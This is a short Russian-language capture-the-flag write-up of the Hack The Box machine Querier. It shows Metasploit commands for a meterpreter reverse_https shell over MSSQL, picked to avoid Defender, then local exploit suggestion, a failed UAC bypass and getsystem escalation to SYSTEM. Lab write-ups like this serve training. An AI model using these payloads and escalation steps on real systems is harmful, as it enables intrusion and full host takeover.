# Отчет по заданию Querier (HTB) **HTB Profile**: https://app.hackthebox.com/profile/activity/906355 **IP**: 10.10.10.125 ...путь до исполнения кода через xp_cmdshell не описываю - всё было на занятии ## Далее #### Backconnect Т.к. работает Defender попробуем использовать шифрованное соединение с агентом meterpreter ```= (msf) > use windows/mssql/mssql_payload (msf) > set payload windows/x64/meterpreter/reverse_https ``` Получаем сессию, получаем флаг пользователя ### Повышение Ищем возможность ```= (msf) > use post/multi/recon/local_exploit_suggester (msf) > run ... ... [+] 10.10.10.125 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable. ``` Пробуем что нашлось ```= (msf) > use exploit/windows/local/bypassuac_sdclt (msf) > set session 18 (msf) > run ... ... [-] Exploit aborted due to failure: no-access: Not in admins group, cannot escalate with this module ``` Не сработало Ищем дальше (и пробуем самое простое) ```= (msf) > sessions -i 18 -C getsystem [*] Running 'getsystem' on meterpreter session 18 (10.10.10.125) ...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)). ``` #### DONE! Флаг админа у нас